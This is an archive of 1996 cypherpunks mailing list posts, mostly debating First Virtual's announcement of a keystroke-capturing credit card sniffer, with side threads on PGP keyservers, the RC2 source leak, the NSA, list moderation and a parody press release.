NEVER TYPE YOUR CREDIT CARD NUMBER INTO A COMPUTER.

There's simply no other way to keep credit cards safe on the net.  The
program we have demonstrated completely undermines the security of all
known programs that claim to handle credit card numbers safely on the
Internet.
--------
Nathaniel Borenstein <nsb@fv.com>
Chief Scientist, First Virtual Holdings
FAQ & PGP key: nsb+faq@nsb.fv.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Tue, 30 Jan 1996 01:09:11 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199601291410.PAA21711@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Of course.  My signature was bad.
  I got a message in response to a request I made to someone for their public
key.  I wanted to check the signatures that they included with their posts
to cypherpunks, but their key was not on the keyservers.  The key they
included was completely unsigned, and when I use it to validate their
previous posts as well as the message they sent which included the key, the
signatures come back as bad, the contents of the file changed.  Names are
appropriately withheld (I hope).  As I understand the bcc: definition, only
I and the first smtp server this message hits should know who it's to.  I
don't know if anyone else reading this mailing list needs this info, but
just in case... here's my reply to the message.

At 10:03 PM 1/28/96 -0800, you wrote:
>Sorry, I'm a newbie to Internet, and also the Internet usage of PGP.  I just
>participated in a local keysigning meeting, so maybe my key will find its
>way to a server.

Don't worry about being a 'newbie'.  Everyone starts somewhere.  However,
your key will usually not 'find its way' to a server without you
specifically sending it.  The keyserver I usually use is accessed by sending
a mail message which fits the following format.  As far as I know, all the
keyservers use this format to add or update keys in their databases.  You
only have to send it to one keyserver, and it will propagate to all the
others.  I have indented the text so that no handlers decide to interpret it
as a new message.

- - To: pgp-public-keys@pgp.iastate.edu
- - Subject: ADD
- -
- - -----BEGIN PGP PUBLIC KEY BLOCK-----
- - Version: 2.6.2
- -
- - [key deleted to protect the innocent]
- -
- - -----END PGP PUBLIC KEY BLOCK-----

>I'm sorry to have to admit that I don't even know how to do this!  Newbie
>alert!

If you don't admit you don't know something, nobody will usually tell you
how to do it.  Also, you should sign your own key.  That will make it harder
to forge, I think.  The reasons were spelled out in a couple of the web
pages I read, but I've forgotten them.  It has something to do with either a
denial of service attack or a man in the middle attack, or both.  The
command to do this is:

pgp -ks 0xHEXKEYID

Honestly, I've only just begun to use pgp myself.  Also, you should add your
e-mail address to the user-id of your key.  The command to do so is: 

pgp -ke 0xHEXKEYID

You will be asked if you wish to add a user id to the key.  Say yes, and
give it your e-mail address.  What this does is it allows people who are
using pgp-enabled mailers to directly encrypt messages to you without
choosing your key manually.

The reason that I have not encrypted this message to you using the key you
provided is that when I extracted the key and re-checked your message, the
signature was no good.  I've found that (using eudora) I must turn off the
word wrap feature of my mailer to allow for good signed messages out.  Of
course, having said this, I'll probably not get a good signature on this
message.  Let me know if it signs ok.

Now, I have a question.  Which attack(s) is/are a person vulnerable to when
distributing an unsigned public key in the open?  Could this actually be a
complex man-in-the-middle attack?  Am I paranoid?



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMQzROLTS4SjerN/RAQGLNwP8DMXP1BLdeygfEaBF//lYZHkxWGFaFx9L
R59KJQ/VaYVU/Q17bFDhXyCztu2IRlzLhBqno+5uHsZTL01M3D1dyXGDBvlxY+FB
kNaClKzeXYqA3Or7Ny2mcgyZW/bGXA6v3Z+RQgDuVrXsJz5wGP/UxBU3Ppr05+qL
i+5KB2efLxA=
=iXlS
-----END PGP SIGNATURE-----








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathaniel Borenstein <nsb@nsb.fv.com>
Date: Tue, 30 Jan 1996 20:38:22 +0800
To: cypherpunks@toad.com
Subject: CONTEST:  Name That Program!
Message-ID: <sl3GafqMc50eQWYD0N@nsb.fv.com>
MIME-Version: 1.0
Content-Type: text/plain


As you may have read in my previous message, First Virtual has developed
and demonstrated a program that completely undermines all known schemes
for using software-encrypted credit cards on the Internet.  More details
are avialable at http://www.fv.com/ccdanger.

That was the easy part.

The hard part, it turns out, is deciding what to call this program. 
We've kicked around a variety of names:

    -- Card Shark
        (because we call the general kind of program a "shark")
    -- Four Solutions
        (because we believe that FV is one of four known approaches 
         to Internet commerce which avoid this attack)
    -- Predator
        (because a program like this is scary to think about!)
    -- Pickpocket
        (because that's vaguely analogous to what it does)
    -- Snoopy
        (because we thought it was cute)
    -- CyberCrash
        (no special reason, it just had a nice ring to it)

In the end, we just couldn't decide.  But we knew it needed a name, so
we've decided to leave it up to the citizens of the Internet.  For that
reason, we're sponsoring a contest.  

We invite you to send your vote "nameit@fv.com".  First Virtual will
have sole discretion in selecting a winning name.  If we select a name
that is submitted by someone on the net, the FIRST person to submit it
will be the winner.  If we select one of the names given above, we will
select at random from all the people who "vote" for that name.

The winner will receive $1000 (US).  Yes, we're really paying $1000 for
the winning name!  (If you have or want a First Virtual seller's
account, we'll pay you through First Virtual, otherwise we'll mail you a
check.)  Twenty-five runners-up will be selected to receive First
Virtual sweatshirts and other memorabilia.

CONTEST RULES:  All entries must be received by email to nameit@fv.com,
on or before February 14, 1996.  Please include all of the following:

	-- Your suggested name for our program.
	-- Your own name and postal mailing address
	-- Your shirt size (in case you're a runner-up)

CONTEST DEADLINE:  February 14, 1996
--------
Nathaniel Borenstein <nsb@fv.com>
Chief Scientist, First Virtual Holdings
FAQ & PGP key: nsb+faq@nsb.fv.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Tue, 30 Jan 1996 05:47:01 +0800
To: Peter Trei <trei@process.com>
Subject: Re: Escrowing Viewing and Reading Habits with the Governmen
In-Reply-To: <199601291907.OAA06949@moe.infi.net>
Message-ID: <Pine.SV4.3.91.960129150914.6284C-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain




> > Do you really think that the FBI foreign counter-intelligence squad has 
> > nothing better to do than keep a database of who is reading Che Guevara 
> > memoirs?
> 
> Yes.
> 
> Heck, I remember this was a big issue about 15 years ago. Try asking
> someone who was active in library science in the late 70's, early 80's.


    I did. They said you're wrong. Shall we start a CP flame-war of
unattributed allegations from librarians who will recall what *they
thought* the FBI is interested in?   




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eric@remailer.net (Eric Hughes)
Date: Wed, 31 Jan 1996 00:40:53 +0800
To: cypherpunks@toad.com
Subject: re: FV Demonstrates Fatal Flaw in Software Encryption of Credit Cards
Message-ID: <199601292324.PAA10191@largo.remailer.net>
MIME-Version: 1.0
Content-Type: text/plain


Thanks to Sandy Sandfort for bringing this to my attention.

   Date: Mon, 29 Jan 1996 15:07:46 -0500 (EST)
   From: Nathaniel Borenstein <nsb@nsb.fv.com>

   As you may already have heard via the popular press, First Virtual
   Holdings has developed and demonstrated a program which completely
   undermines the security of every known credit-card encryption mechanism
   for Internet commerce.

I'm breaking my silence in cypherpunks to respond to what must be the
most self-serving and fatuous expression of "concern" I've seen in a
while.

To wit:  Ohmygod!  PC's don't have perfect integrity!

Will someone please write a filter for common email packages which
automatically removes selected First Virtual transactions from the
confirmation messages?  Encryption isn't the issue, Nathaniel, and you
know it.  Me, I prefer bad faith over stupidity as an explanation for
this latest outpouring.

To all those Internet payment analysts out there:
   Financial institutions are in the business of risk transfer.  If
you don't transfer risk in some form, you're not a financial
institution but rather a service bureau.  Managing endpoint integrity
risk is just one of the kinds of risk an Internet payments provider
has to deal with.  First Virtual has demonstrated time and again that
they're pretty clueless about the whole subject of risk.  As a result,
I don't give them more than about two years longer before they go
belly up.

Eric




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dmacfarlane@zip.sbi.com (David Macfarlane)
Date: Tue, 30 Jan 1996 06:16:57 +0800
To: cypherpunks@toad.com
Subject: FV's Borenstein discovers keystroke capture programs! (pictures at 11!)
Message-ID: <9601292041.AA14422@zip_master2.sbi.com>
MIME-Version: 1.0
Content-Type: text/plain


Is this the most transparent media attention grab or what?  FV's
"Chief Scientist" writes a killer application to destroy
Internet commerce and it is really only a keystroke capture
program with a bit of credit card number recognition code tacked
on.

I don't think this has any "implications for Internet commerce".
If you run any number of virus protection programs on your
computer, and you get your software from reliable sources,
you never need worry about clandestine number snarfing.

I readily admit that there is a larger issue about viruses and
being able to trust your software, but the presentation from FV
of this announcement as a "fatal flaw" in internet commerce is
remarkably disingenuous.  They are really saying, "We have the
only safe approach" quietly between the lines.

And before pm. says it, this has very little to do with
cryptography.

Skeptically yours,

	David Macfarlane.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Tue, 30 Jan 1996 10:34:11 +0800
To: zinc@zifi.genetics.utah.edu (zinc)
Subject: Re: FV Demonstrates Fatal Flaw in Software Encryption of Credit Cards
In-Reply-To: <Pine.LNX.3.91.960129141757.184E-100000@zifi.genetics.utah.edu>
Message-ID: <199601292359.PAA24832@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> the point is not that this can be done, the point is that users need
> tools that would check for programs like this running on their
> system.  is fv making a 'fix' available?  i would imagine a  'fix'
> would be a program that would look for tsr type programs (or inits on
> a mac) that do this sort of thing.  

	Of course they won't. FV's claimed "fix" is their product,
which is a joke of appayment system. You actually think they would
release a virus checker that would effectively hurt their FUD-based
marketing?

> it's disapointing to see the spin put on this by fv.  instead of

	Its not surprising, given FV's attitude.


-- 
Sameer Parekh					Voice:   510-601-9777x3
Community ConneXion, Inc.			FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org/ (or login as "guest")		sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Anthony C. Zboralski" <frantic@worldnet.net>
Date: Mon, 29 Jan 1996 23:26:58 +0800
To: ECafe Anonymous Remailer <cpunk@remail.ecafe.org>
Subject: Re: pgp on linux
In-Reply-To: <199601290513.FAA30591@pangaea.hypereality.co.uk>
Message-ID: <Pine.LNX.3.91.960129160311.1321B-100000@trashint.sct.fr>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Mon, 29 Jan 1996, ECafe Anonymous Remailer wrote:

> i can't seem to get pgp compiled on my linux machine. where should i ask
> about this?- since cypherpunks would be a bad choice. thanks.
> 

get 2.6.3i it compiles straight out of the box


____  
\  /__  Anthony C. Zboralski <frantic@worldnet.net>
 \/  /  
   \/   Finger <frantic@webbar.imaginet.fr> for PGP Public Key


-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: noconv

iQCVAwUBMQzh31/59mQ4I551AQFczgQAkH3xYf3m4Fll2pJa4MnroikawHcFqRzQ
2IiFEFiyubX8UEgsiSj7zvwSJVRDLUJ/JflX8r+n28BbFPhRNUVcnQN3WPyNpusP
hCtvbnheGVj1I++elqwFnpqz50BdT3RLQ7/5Zu2R5tXkuVCpTpGctUbzpbb6jain
qhYQdQtKGsU=
=mOG5
-----END PGP SIGNATURE-----
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wlkngowl@unix.asb.com (Mutatis Mutantdis)
Date: Tue, 30 Jan 1996 00:38:16 +0800
To: cypherpunks@toad.com
Subject: Re: Downsizing the NSA
Message-ID: <199601291613.LAA08537@UNiX.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 28 Jan 1996 02:04:52 -0800, Tim wrote:

[..]
>However, as Phill notes, the NSA and other intelligence agencies are now in
>that most dangerous of positions: a powerful agency or department casting
>about for something to do.

>Spying on citizens and keeping the keys to their private communications and
>diaries is not an appropriate option.

>AT&T is downsizing, IBM downsized a while back, so why couldn't the NSA
>just do the right thing: admit that the Soviet threat is no more,
>congratulate the victors, and downsize by 20,000 employees?

Perhaps they are worried about the implications of putting thousands
of cryptographers into the private sector?

And what if you were one of them? You'd probably have a hard time
using or publishing anything classified.  Not to mention the usual
governmental conflict-of-interest work rules (for low-level employees
the standards of who you can work for after leaving the government is
a lot stricter than if you were a cabinet member).

Just a thought.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wlkngowl@unix.asb.com (Mutatis Mutantdis)
Date: Tue, 30 Jan 1996 00:31:13 +0800
To: Censored Girls Anonymous <cypherpunks@toad.com
Subject: Re: CP LITE: A Censorship Device?
Message-ID: <199601291616.LAA08581@UNiX.asb.com>
MIME-Version: 1.0
Content-Type: text/plain



I think the mail-to-news gateway is better than a "lite" list at this
point.

On Sun, 28 Jan 1996 03:54:31 -0600,  Carol Anne wrote:

>I've been watching this CP Lite thing develop.

>Sounds like an attempt to moderate the list.
>I mean it's easy to post out of it,
>but hard to answer to it.
>And all of the good back and forth discussion
>gets lost in a backwash of private email.

>There is just no way I will send someone an
>email to a posting they post out of there.
>I think that would be a disservice to everyone here.

>Love Always,

>Carol Anne
>--

>Member Internet Society  - Certified BETSI Programmer  -  Webmistress
>***********************************************************************
>Carol Anne Braddock (cab8)  carolann@censored.org   206.42.112.96
>My Homepage
>The Cyberdoc
>***********************************************************************
>------------------ PGP.ZIP Part [017/713] -------------------
>M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
>MF=O0H+*%(-S%&>S%+FS&<LS%3(Q&#W1"<]2%`H^;,]^1C$'HBN8PX$4SYAU^
>MPGD<Q0ZLA0D+,`MCT!LA**4M[-JPAK9F?40!AJ,CW"'%DR#:'9?Q)3[%<DQ`
>-------------------------------------------------------------
>for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@c2.org>
Date: Tue, 30 Jan 1996 10:57:19 +0800
To: cypherpunks@toad.com
Subject: Authentication of crypto clients
Message-ID: <Pine.SUN.3.91.960129160857.27262A-100000@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


This post contains (somewhat) technical discussion of (what I believe
is) an important issue in integrating crypto with applications that do
not contain their own cryptographic implementation. If that doesn't
interest you, hit 'n' to resume your regularly scheduled flamefest.

The issue is: how does the crypto provider authenticate the client?
For example, if the crypto provider can accpet connections from any
application in the user's process space, then any bogus application
can easily start decrypting and signing as it likes. In this model, a
precondition for security is that no bogus programs can be allowed to
run.

An alternative, slightly more complex model is that the client must
somehow authenticate itself to the crypto provider. One simple way of
doing this is to require the client request a password from the user,
which is then forwarded to the crypto provider. The crypto provider
will only provide service on connections which have been authenticated
in this way. This model gives security even in the face of some bogus
applications.

Of course, as Nathaniel quietly reminded us this morning, any bogus
application which can intercept keystrokes can subvert any such client
authentication. Barry Jaspan (in his analysis of a security flaw in
SSH 1.2.0) reminds us that access to the image of the process is also
sufficient to break security. Perhaps the class of bogus programs
which have enough capabilities to connect to the crypto provider, but
not enough to intercept keystrokes or examine RAM is null, meaning
that the two models have equivalent security. Actually, the simpler
model has some security advantages, because the client never has to
deal with any very sensitive material, such as the password.

I'm interested in this question right now because the current version
of premail implements the simpler model (in fact, it simply stores all
the secrets in a file in /tmp, with permissions set to 600). I want to
know whether it's worth the trouble to design and implement an
approach based on per-client authentication.

This issue is also relevant to the discussion of Microsoft's CAPI,
which (as far as I can tell) allows only the simpler model. I'm not
saying it's bad, but I do feel that the implications should be
discussed. Thus, I have forwarded a copy of this post to
cryptapi@microsoft.com in case they have any comments.

If there's been a discussion of this that I missed, then apologies for
brining it up again and appreciation in advance for any pointers.

Raph




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Rosenberg" <hal9001@panix.com>
Date: Wed, 31 Jan 1996 03:56:27 +0800
To: "Declan B. McCullagh" <declan+@CMU.EDU>
Subject: Re: Ernst Zundel impersonator on Usenet
Message-ID: <v02140a00ad323e18e663@[165.254.158.237]>
MIME-Version: 1.0
Content-Type: text/plain


At 0:24 1/29/96, Declan B. McCullagh wrote:

>I'm not familiar with how AOL screen names work, but my guess is that
>the Kingston, NY resident impersonating Zundel forgot to switch back
>to his other screen name before posting.

You have to log-off and then log back in to change use a different UserName.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Tue, 30 Jan 1996 17:17:26 +0800
To: nobody@c2.org (Anonymous User)
Subject: Re: RC2 source code
In-Reply-To: <199601292158.NAA04160@infinity.c2.org>
Message-ID: <199601300011.QAA27900@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	We have a winner. ;-)

	Seriously, can someone with access to RC2 verify this? Let's
try to see if we can get some real work done in the midst of all this
FV flamage.

> 
> Reposted from sci.crypt:
> 
> /**********************************************************************\
> * To commemorate the 1996 RSA Data Security Conference, the following  *
> * code is released into the public domain by its author.  Prost!       *
> *                                                                      *
> * This cipher uses 16-bit words and little-endian byte ordering.       *
> * I wonder which processor it was optimized for?                       *
> *                                                                      *
> * Thanks to CodeView, SoftIce, and D86 for helping bring this code to  *
> * the public.                                                          *
> \**********************************************************************/
> 

-- 
Sameer Parekh					Voice:   510-601-9777x3
Community ConneXion, Inc.			FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org/ (or login as "guest")		sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Rosenberg" <hal9001@panix.com>
Date: Tue, 30 Jan 1996 08:18:10 +0800
To: jfricker@vertexgroup.com (John F. Fricker)
Subject: Re: [NOISE] Re: The Big Lie
Message-ID: <v02140a01ad32440a4bf4@[165.254.158.237]>
MIME-Version: 1.0
Content-Type: text/plain


At 15:54 1/28/96, John F. Fricker wrote:

>Besides in this day and age where Isreal is a nuclear arsenal run by nutty
>rightwing warlords who in their right mind would dare belittle their
>tragedies.

When the world community has a double standard when it comes to treating
Isreal's actions differently from any other country, those "warlords" might
be justified in their actions. Can you name any other country that was a
non-participant in a war, was attacked by one side, and was told by the
other side that they could neither join that side nor retaliate for the
attacks (I'm talking about Operation Desert Storm and the Scuds aimed at
Isreal). Any other country would have been allowed to participate or
allowed to declare war on the attacker (and send a few missiles over as an
incentive to stop attacking a neutral party to the war). The US (and the
others Participants) were scared shitless of allowing Isreal into the fight
since, if let it, the war would have been over real fast and Sadam H. would
have been pushing up daisies (The Isrealis have a habit of being able to
take care of themselves with minimal "collateral damage" when their hands
are not tied by the actions of other Governments telling them that they are
not allowed to do what any other Government is allowed to do as a matter of
normal policy when faced with aggression).






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cman@communities.com (Douglas Barnes)
Date: Tue, 30 Jan 1996 17:26:15 +0800
To: cypherpunks@toad.com
Subject: More FUD from the Luddites at FV
Message-ID: <v02130501ad330124ebc0@[199.2.22.120]>
MIME-Version: 1.0
Content-Type: text/plain



Once again, FV has decided that it is easier to spread Fear,
Uncertainty and Doubt than innovate. This is part of a continuing
pattern that has been extensively documented in previous threads
on this mailing list.

There are a great many problems with the claims that FV are
making with respect to their souped-up keyboard sniffer; here
is the one I consider to be the clincher:

If I can place any program of my design on a user's machine to
sniff credit cards, I can easily exert total control over all of
the e-mail sent or received from that machine. Since I can
do this, it is now trivially easy to circumvent the "security"
of FV e-mail confirmations.

Furthermore, to do this, all I really need is control over the
network traffic to that user's machine, which in many instances
is going to be easier than placing a program on someone's machine.

I can then set up dummy companies that my "virus" or whatever
will buy "information" from -- some of these might get detected
when user's get their bills, but this hypothetical program might
chose amounts that would disappear into the noise of actual,
legitimate purchases.

Therefore, the real moral of the story is:

DON'T PUT UNTRUSTWORTHY PROGRAMS ON YOUR HARD DISK

--doug

P.S. a good video camera in the right spot, or a telephone
tap of a major mail-order distributor could probably get you
more credit cards, faster, than the FV approach. Credit cards
are fundamentally insecure; typing your CC# into your computer is
no more dangerous than giving it to the minimum-wage clerk
at Denny's. This insecurity is factored into the business model
of the credit card companies -- end users do not pay one dime
for erroneous or fradulent charges that lack a signature along
with a card swipe or imprint.



------                                                             ------
Douglas Barnes         "The tighter you close your fist, Governor Tarkin,
cman@communities.com    the more systems will slip through your fingers."
cman@best.com                                             --Princess Leia






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <ptrei@acm.org>
Date: Tue, 30 Jan 1996 08:13:11 +0800
To: cypherpunks@toad.com
Subject: Re: FV Demonstrates Fatal Flaw in Software Encryption of Credit
Message-ID: <9601292111.AA23738@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Someone claiming to be "Nathanial Borenstein" writes:
> As you may already have heard via the popular press, First Virtual
> Holdings has developed and demonstrated a program which completely
> undermines the security of every known credit-card encryption mechanism
> for Internet commerce. 

[...]

I started reading this thinking it was actually something important. All it describes 
is a keyboard monitor, which greps for CC#s, and which could be spread by an 
(unspecified) virus, and sends the output to a crook over the net by some (unspecified) 
mechanism.

So, what else is new?

[...]

> Nathaniel Borenstein <nsb@fv.com>
>Chief Scientist, First Virtual Holdings
>FAQ & PGP key: nsb+faq@nsb.fv.com

It's sort of interesting that "Nathaniel Borenstein" has a PGP key, but failed to 
clearsign this message, which loudly trumpets it's great import. Considering the
lack of actual content, I feel compelled to warn readers that this may be a forgery, 
designed to make him look like he's scaremongering. 

strictly speaking for myself

Peter Trei
ptrei@acm.org

Peter Trei
Senior Software Engineer
Purveyor Development Team                                
Process Software Corporation
http://www.process.com
trei@process.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: arromdee@jyusenkyou.cs.jhu.edu (Ken Arromdee)
Date: Tue, 30 Jan 1996 08:22:11 +0800
To: cypherpunks@toad.com
Subject: Re: "German service cuts Net access" (to Santa Cruz)
In-Reply-To: <m0tgnaN-0006FvC@dwarf>
Message-ID: <4ejdoq$ppt@jyusenkyou.cs.jhu.edu>
MIME-Version: 1.0
Content-Type: text/plain


>Is it constitutionally protected in US to knowingly hurt other
>people's feelings and to trample on graves?????

Yes.  Free speech for the nonoffensive is not free speech at all.

BTW, I am Jewish.
--
Ken Arromdee (arromdee@jyusenkyou.cs.jhu.edu, karromde@nyx.cs.du.edu;
    http://www.cs.jhu.edu/~arromdee)

"Snow?" "It's sort of like white, lumpy, rain." --Gilligan's Island




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Paul E. Campbell" <pecampbe@mtu.edu>
Date: Tue, 30 Jan 1996 12:14:01 +0800
To: cypherpunks@toad.com
Subject: FL Demonstrates Fatal Flaw in Logins
Message-ID: <199601292131.QAA28818@metlab1.my.mtu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Okay..so I couldn't resist. This stuff is almost too good to be real. I've
doctored up their propaganda a little to help make a better impact on the
"average user". :)

FL Demonstrates Fatal Flaw in Logins

[My apologies in advance if you see several copies of this message.  I
am posting this fairly widely due to the severity and importance of the
problem described.]

As you may already have heard via the popular press, First Login Security
Corporation has developed and demonstrated a program which completely
undermines the security of every known login mechanism. This is a very
serious matter because any person attending first year computer science
courses can easily implement such a program. We want to make sure that the
Internet community is properly informed about the nature of the problem that
we have uncovered, and to buy our new sooper-dooper fingerprint sniffer
addon device all workstations, vehicle entry systems, and personalized
toaster settings. In this (unavoidably short) post, I will try to explain
the nature of the problem and its implications for Internet commerce. In
deference to those are are not as stupid as the ones to whom this propaganda
is aimed, we will hide the explanation of how the attack works until the last
part of this message.

First of all, let me be perfectly clear about the nature of the problem
we have exposed.  It is NOT a bug in a single program, and it is
therefore NOT something that can be fixed with a "patch" or any other
kind of software upgrade.  Instead, we have demonstrated a very general
attack that undermines ALL programs that ask users to type in their username
and password into their home computer.  We have tested the program and
confirmed that it undermines the security of the login software from Windows
95 and from SunOS, and we expect that it will work similarly for ANY future
software based on passwords.  Quite simply, we believe that this program
demonstrates a FATAL flaw in one whole approach to Internet authentication,
and that the use of software to enter passwords can NEVER be made safe.
For normal users, we recommend the following simple rule:

NEVER TYPE YOUR PASSWORD INTO A COMPUTER.

We should also be clear about the Internet authentication mechanisms that
are NOT affected by this problem.  First Login is unaffected because we
never ask the user to put their password at risk by typing it into
a computer.  Hardware-based solutions can also be devised that are
immune to this attack, including solutions based on retinal scanners,
smart cards, and fingerprint identification devices in the home.  We believe
that current zero-knowledge proofs are also not vulnerable to this attack,
although some variants of zero-knowledge proofs may be vulnerable to a similar
form of attack.  Other mechanisms based on the use of cellular telephones or
shared fax machines to transmit secret passwords are also unaffected by this
kind of attack.  Other proposed login mechanisms should, from now on,
be evaluated with this kind of attack in mind.  The bottom line: 
INTERNET AUTHENTICATION CAN BE VERY SAFE, WITH SEVERAL DIFFERENT MECHANISMS,
BUT USING SIMPLE PASSWORDS IS NOT ONE OF THE SAFE MECHANISMS.

It's important to understand why we have taken this step.  Obviously, as
the long-time leaders in Internet espionage, the last thing we would want
to do is to undermine general confidence in Internet logins.  However,
we realized that many people believed that simply logging in was a
safe and easy path to the internet superhighway, and that very few people
understood how easily it could be undermined.  Upon investigation, we
were frankly startled to realize just how easy it was -- a single
programmer got the first version of our login spoofing program running in
about a week, shortly after he mastered the intricacies of the printf()
function. Solutions to not echo the password to the screen took a year
later before we discovered the ioctl() function. Aside from our obvious
interest in promoting our own ridiculously overpriced product that has such
a high failure rate that your company will probably drop kick it into the
trash can, we felt that we had an ethical obligation to bring this
problem to the attention of the consumers, banks, and other financial
institutions who could conceivably suffer catastrophic losses when we are
stealing their corporate secrets by espionage.  In short, we have been in
the business of spying for years and quite frankly, our guilty conscience
started to get on us.  So we took the time to warn users so we could feel
better the next time we helped a large corporation totally rip the shirts
off the back of a small business owner, since we warned you ahead of time
before we stole everything.

We also realize that we have an obligation to do everything possible to
avoid helping any unscrupulous people who might seek to utilize this
flaw for malicious purposes.  Frankly, we're concerned that our competitors
will have it as easy as we did in the future.  We now have the money and
reputation to afford sophisticated bribes and cat burglary tools, so we
don't have as much use for login spoofing programs anymore that we once
did.  We also demonstrated login spoofing to such vital organizations as
CERT, the review board of the New England Journal of Medicine, and the
Association of Police Chiefs because nobody else would take us seriously.
Only after many such private disclosures in which we preyed on the paranoia
of the organizations involved did we dare publish the code directly on the
internet in a public area of a hacker's convention ftp site.

In addition, we have taken several steps to "cripple" our demonstration
program, all of which will be discussed below.  We wrote it in APL as an
entry to the Obfuscated APL Code Contest, not realizing at the time that
all APL code looks that way. We took out the echo suppressing ioctl() calls
because they aren't supported in our version of APL anyway. And we stored
the attempted logins in a memory array before the program exitted instead of
a disk file so that the program can't be used by anyone who doesn't
understand APL.

The bottom line, once again, for those of you who have read this far:

NEVER TYPE YOUR PASSWORD INTO A COMPUTER.

The stupid ad for our new scam/product:

The way our program works is really quite simple. First, all users fill out
a 1000 question purity test and the results are entered into the program's
database.

Then after typing your user name, the program generates a quiz based on your
purity score. It authenticates you from a highly accurate estimate of your
purity score and a list of personal questions such as the name of your
mother's ex-husband's first dog's color.

As an added bonus, we also offer the Sneaker II, a clever employee evaluation
tool which uses the answers on the purity test to determine the most likely
fetishes and potential crimes of all the employees in your company. As an
added bonus, Sneaker II will also give you 3 free megabytes of downloads from
our own extensive smut database culled from corporate men that we have
personally spied on during some of our highly sensitive personal affairs
assignments.

Natasha Boredstein <nb@fake.com>
Chief Propagandist, First Login Security




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: vin@shore.net (Vin McLellan)
Date: Tue, 30 Jan 1996 11:06:15 +0800
To: cypherpunks@toad.com
Subject: <fwd> FV's crypted credit card "attack"
Message-ID: <v02130505ad32edb83930@[198.115.179.202]>
MIME-Version: 1.0
Content-Type: text/plain



Date: Mon, 29 Jan 1996 15:43:53 -0500
Subject: IP: FV's position on Merc article

Date: Mon, 29 Jan 1996 10:44:26 -0500 (EST)
From: Nathaniel Borenstein <nsb@nsb.fv.com>

================
As you may already have heard via the popular press, First Virtual
Holdings has developed and demonstrated a program which completely
undermines the security of every known credit-card encryption mechanism
for Internet commerce.  This is a very serious matter, and we want to
make sure that the Internet community is properly informed about the
nature of the problem that we have uncovered, and the manner in which we
have made the information known.  In this (unavoidably lengthy) post, I
will try to explain the nature of the problem and its implications for
Internet commerce.  In deference to those who are not technically
oriented, the detailed explanation of how the attack works will be the
LAST part of this message.

First of all, let me be perfectly clear about the nature of the problem
we have exposed.  It is NOT a bug in a single program, and it is
therefore NOT something that can be fixed with a "patch" or any other
kind of software upgrade.  Instead, we have demonstrated a very general
attack that undermines ALL programs that ask users to type a credit card
number into their home computer.  We have tested the program and
confirmed that it undermines the security of the credit card encryption
software from Netscape and Cybercash, and we expect that it will work
similarly for ANY future software based on the encryption of credit card
numbers on the desktop.  Quite simply, we believe that this program
demonstrates a FATAL flaw in one whole approach to Internet commerce,
and that the use of software to encrypt credit card numbers can NEVER be
made safe.  For consumers, we recommend the following simple rule:

NEVER TYPE YOUR CREDIT CARD NUMBER INTO A COMPUTER.

We should also be clear about the Internet commerce mechanisms that are
NOT affected by this problem.  First Virtual is unaffected because we
never ask the user to put a credit card number at risk by typing it into
a computer.  Hardware-based solutions can also be devised that are
immune to this attack, including solutions based on smart cards and
solutions based on "card swipe" machines in the home.  We believe that
current digital cash solutions are also not vulnerable to this attack,
although some variants of digital cash may be vulnerable to a similar
form of attack.  Commerce mechanisms based on the use of telephones or
fax machines to transmit credit card numbers are also unaffected by this
kind of attack.  Other proposed commerce mechanisms should, from now on,
be evaluated with this kind of attack in mind.  The bottom line:
INTERNET COMMERCE CAN BE VERY SAFE, WITH SEVERAL DIFFERENT MECHANISMS,
BUT ENCRYPTING CREDIT CARDS ON THE DESKTOP IS NOT ONE OF THE SAFE
MECHANISMS.

It's important to understand why we have taken this step.  Obviously, as
the long-time leaders in Internet commerce, the last thing we would want
to do is to undermine general confidence in Internet commerce.  However,
we realized that many people believed that credit card encryption was a
safe and easy path to Internet commerce, and that very few people
understood how easily it could be undermined.  Upon investigation, we
were frankly startled to realize just how easy it was -- a single
